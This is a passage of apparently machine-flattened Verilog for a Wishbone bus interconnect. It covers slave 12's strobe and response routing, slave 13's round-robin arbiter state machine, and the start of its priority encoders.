    always @ (  ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd12 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd12 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd12 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd12 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd12 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd12 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd12 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd12 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s12_wb_stb_o = ( ( ( m0_slv_sel == 4'd12 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s12_wb_stb_o = ( ( ( m1_slv_sel == 4'd12 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s12_wb_stb_o = ( ( ( m2_slv_sel == 4'd12 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s12_wb_stb_o = ( ( ( m3_slv_sel == 4'd12 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s12_wb_stb_o = ( ( ( m4_slv_sel == 4'd12 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s12_wb_stb_o = ( ( ( m5_slv_sel == 4'd12 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s12_wb_stb_o = ( ( ( m6_slv_sel == 4'd12 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s12_wb_stb_o = ( ( ( m7_slv_sel == 4'd12 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s12_m0_ack_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s12_ack_i );
    assign s12_m1_ack_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s12_ack_i );
    assign s12_m2_ack_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s12_ack_i );
    assign s12_m3_ack_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s12_ack_i );
    assign s12_m4_ack_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s12_ack_i );
    assign s12_m5_ack_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s12_ack_i );
    assign s12_m6_ack_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s12_ack_i );
    assign s12_m7_ack_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s12_ack_i );
    assign s12_m0_err_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s12_err_i );
    assign s12_m1_err_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s12_err_i );
    assign s12_m2_err_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s12_err_i );
    assign s12_m3_err_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s12_err_i );
    assign s12_m4_err_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s12_err_i );
    assign s12_m5_err_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s12_err_i );
    assign s12_m6_err_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s12_err_i );
    assign s12_m7_err_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s12_err_i );
    assign s12_m0_rty_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s12_rty_i );
    assign s12_m1_rty_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s12_rty_i );
    assign s12_m2_rty_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s12_rty_i );
    assign s12_m3_rty_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s12_rty_i );
    assign s12_m4_rty_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s12_rty_i );
    assign s12_m5_rty_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s12_rty_i );
    assign s12_m6_rty_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s12_rty_i );
    assign s12_m7_rty_o = ( ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s12_rty_i );
    assign s13_wb_data_i = s13_data_i;
    assign s13_data_o = s13_wb_data_o;
    assign s13_addr_o = s13_wb_addr_o;
    assign s13_sel_o = s13_wb_sel_o;
    assign s13_we_o = s13_wb_we_o;
    assign s13_cyc_o = s13_wb_cyc_o;
    assign s13_stb_o = s13_wb_stb_o;
    assign s13_wb_ack_i = s13_ack_i;
    assign s13_wb_err_i = s13_err_i;
    assign s13_wb_rty_i = s13_rty_i;
    always @ (  posedge clk_i)
    begin
        s13_next <=  ~( s13_wb_cyc_o);
    end
    assign s13_arb_req = { m7_s13_cyc_o, m6_s13_cyc_o, m5_s13_cyc_o, m4_s13_cyc_o, m3_s13_cyc_o, m2_s13_cyc_o, m1_s13_cyc_o, m0_s13_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s13_arb_state <= s13_arb_grant0;
        end
        else
        begin 
            s13_arb_state <= s13_arb_next_state;
        end
    end
    always @ (  s13_arb_state or  { m7_s13_cyc_o, m6_s13_cyc_o, m5_s13_cyc_o, m4_s13_cyc_o, m3_s13_cyc_o, m2_s13_cyc_o, m1_s13_cyc_o, m0_s13_cyc_o } or  1'b0)
    begin
        s13_arb_next_state = s13_arb_state;
        case ( s13_arb_state ) 
        s13_arb_grant0:
        begin
            if (  !( s13_arb_req[0]) | 1'b0 ) 
            begin
                if ( s13_arb_req[1] ) 
                begin
                    s13_arb_next_state = s13_arb_grant1;
                end
                else
                begin 
                    if ( s13_arb_req[2] ) 
                    begin
                        s13_arb_next_state = s13_arb_grant2;
                    end
                    else
                    begin 
                        if ( s13_arb_req[3] ) 
                        begin
                            s13_arb_next_state = s13_arb_grant3;
                        end
                        else
                        begin 
                            if ( s13_arb_req[4] ) 
                            begin
                                s13_arb_next_state = s13_arb_grant4;
                            end
                            else
                            begin 
                                if ( s13_arb_req[5] ) 
                                begin
                                    s13_arb_next_state = s13_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s13_arb_req[6] ) 
                                    begin
                                        s13_arb_next_state = s13_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s13_arb_req[7] ) 
                                        begin
                                            s13_arb_next_state = s13_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_arb_grant1:
        begin
            if (  !( s13_arb_req[1]) | 1'b0 ) 
            begin
                if ( s13_arb_req[2] ) 
                begin
                    s13_arb_next_state = s13_arb_grant2;
                end
                else
                begin 
                    if ( s13_arb_req[3] ) 
                    begin
                        s13_arb_next_state = s13_arb_grant3;
                    end
                    else
                    begin 
                        if ( s13_arb_req[4] ) 
                        begin
                            s13_arb_next_state = s13_arb_grant4;
                        end
                        else
                        begin 
                            if ( s13_arb_req[5] ) 
                            begin
                                s13_arb_next_state = s13_arb_grant5;
                            end
                            else
                            begin 
                                if ( s13_arb_req[6] ) 
                                begin
                                    s13_arb_next_state = s13_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s13_arb_req[7] ) 
                                    begin
                                        s13_arb_next_state = s13_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s13_arb_req[0] ) 
                                        begin
                                            s13_arb_next_state = s13_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_arb_grant2:
        begin
            if (  !( s13_arb_req[2]) | 1'b0 ) 
            begin
                if ( s13_arb_req[3] ) 
                begin
                    s13_arb_next_state = s13_arb_grant3;
                end
                else
                begin 
                    if ( s13_arb_req[4] ) 
                    begin
                        s13_arb_next_state = s13_arb_grant4;
                    end
                    else
                    begin 
                        if ( s13_arb_req[5] ) 
                        begin
                            s13_arb_next_state = s13_arb_grant5;
                        end
                        else
                        begin 
                            if ( s13_arb_req[6] ) 
                            begin
                                s13_arb_next_state = s13_arb_grant6;
                            end
                            else
                            begin 
                                if ( s13_arb_req[7] ) 
                                begin
                                    s13_arb_next_state = s13_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s13_arb_req[0] ) 
                                    begin
                                        s13_arb_next_state = s13_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s13_arb_req[1] ) 
                                        begin
                                            s13_arb_next_state = s13_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_arb_grant3:
        begin
            if (  !( s13_arb_req[3]) | 1'b0 ) 
            begin
                if ( s13_arb_req[4] ) 
                begin
                    s13_arb_next_state = s13_arb_grant4;
                end
                else
                begin 
                    if ( s13_arb_req[5] ) 
                    begin
                        s13_arb_next_state = s13_arb_grant5;
                    end
                    else
                    begin 
                        if ( s13_arb_req[6] ) 
                        begin
                            s13_arb_next_state = s13_arb_grant6;
                        end
                        else
                        begin 
                            if ( s13_arb_req[7] ) 
                            begin
                                s13_arb_next_state = s13_arb_grant7;
                            end
                            else
                            begin 
                                if ( s13_arb_req[0] ) 
                                begin
                                    s13_arb_next_state = s13_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s13_arb_req[1] ) 
                                    begin
                                        s13_arb_next_state = s13_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s13_arb_req[2] ) 
                                        begin
                                            s13_arb_next_state = s13_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_arb_grant4:
        begin
            if (  !( s13_arb_req[4]) | 1'b0 ) 
            begin
                if ( s13_arb_req[5] ) 
                begin
                    s13_arb_next_state = s13_arb_grant5;
                end
                else
                begin 
                    if ( s13_arb_req[6] ) 
                    begin
                        s13_arb_next_state = s13_arb_grant6;
                    end
                    else
                    begin 
                        if ( s13_arb_req[7] ) 
                        begin
                            s13_arb_next_state = s13_arb_grant7;
                        end
                        else
                        begin 
                            if ( s13_arb_req[0] ) 
                            begin
                                s13_arb_next_state = s13_arb_grant0;
                            end
                            else
                            begin 
                                if ( s13_arb_req[1] ) 
                                begin
                                    s13_arb_next_state = s13_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s13_arb_req[2] ) 
                                    begin
                                        s13_arb_next_state = s13_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s13_arb_req[3] ) 
                                        begin
                                            s13_arb_next_state = s13_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_arb_grant5:
        begin
            if (  !( s13_arb_req[5]) | 1'b0 ) 
            begin
                if ( s13_arb_req[6] ) 
                begin
                    s13_arb_next_state = s13_arb_grant6;
                end
                else
                begin 
                    if ( s13_arb_req[7] ) 
                    begin
                        s13_arb_next_state = s13_arb_grant7;
                    end
                    else
                    begin 
                        if ( s13_arb_req[0] ) 
                        begin
                            s13_arb_next_state = s13_arb_grant0;
                        end
                        else
                        begin 
                            if ( s13_arb_req[1] ) 
                            begin
                                s13_arb_next_state = s13_arb_grant1;
                            end
                            else
                            begin 
                                if ( s13_arb_req[2] ) 
                                begin
                                    s13_arb_next_state = s13_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s13_arb_req[3] ) 
                                    begin
                                        s13_arb_next_state = s13_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s13_arb_req[4] ) 
                                        begin
                                            s13_arb_next_state = s13_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_arb_grant6:
        begin
            if (  !( s13_arb_req[6]) | 1'b0 ) 
            begin
                if ( s13_arb_req[7] ) 
                begin
                    s13_arb_next_state = s13_arb_grant7;
                end
                else
                begin 
                    if ( s13_arb_req[0] ) 
                    begin
                        s13_arb_next_state = s13_arb_grant0;
                    end
                    else
                    begin 
                        if ( s13_arb_req[1] ) 
                        begin
                            s13_arb_next_state = s13_arb_grant1;
                        end
                        else
                        begin 
                            if ( s13_arb_req[2] ) 
                            begin
                                s13_arb_next_state = s13_arb_grant2;
                            end
                            else
                            begin 
                                if ( s13_arb_req[3] ) 
                                begin
                                    s13_arb_next_state = s13_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s13_arb_req[4] ) 
                                    begin
                                        s13_arb_next_state = s13_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s13_arb_req[5] ) 
                                        begin
                                            s13_arb_next_state = s13_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_arb_grant7:
        begin
            if (  !( s13_arb_req[7]) | 1'b0 ) 
            begin
                if ( s13_arb_req[0] ) 
                begin
                    s13_arb_next_state = s13_arb_grant0;
                end
                else
                begin 
                    if ( s13_arb_req[1] ) 
                    begin
                        s13_arb_next_state = s13_arb_grant1;
                    end
                    else
                    begin 
                        if ( s13_arb_req[2] ) 
                        begin
                            s13_arb_next_state = s13_arb_grant2;
                        end
                        else
                        begin 
                            if ( s13_arb_req[3] ) 
                            begin
                                s13_arb_next_state = s13_arb_grant3;
                            end
                            else
                            begin 
                                if ( s13_arb_req[4] ) 
                                begin
                                    s13_arb_next_state = s13_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s13_arb_req[5] ) 
                                    begin
                                        s13_arb_next_state = s13_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s13_arb_req[6] ) 
                                        begin
                                            s13_arb_next_state = s13_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s13_msel_req = { m7_s13_cyc_o, m6_s13_cyc_o, m5_s13_cyc_o, m4_s13_cyc_o, m3_s13_cyc_o, m2_s13_cyc_o, m1_s13_cyc_o, m0_s13_cyc_o };
    assign s13_msel_pri_enc_valid = { m7_s13_cyc_o, m6_s13_cyc_o, m5_s13_cyc_o, m4_s13_cyc_o, m3_s13_cyc_o, m2_s13_cyc_o, m1_s13_cyc_o, m0_s13_cyc_o };
    always @ (  s13_msel_pri_enc_valid[0] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[0]) ) 
        begin
            s13_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'h1 ) 
                begin
                    s13_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'h2 ) 
                    begin
                        s13_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s13_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[0] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[0]) ) 
        begin
            s13_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s13_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[1] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[1]) ) 
        begin
            s13_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'h1 ) 
                begin
                    s13_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'h2 ) 
                    begin
                        s13_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s13_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[1] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[1]) ) 
        begin
            s13_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s13_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[2] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[2]) ) 
        begin
            s13_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'h1 ) 
                begin
                    s13_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'h2 ) 
                    begin
                        s13_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s13_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[2] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[2]) ) 
        begin
            s13_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s13_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[3] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[3]) ) 
        begin
            s13_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
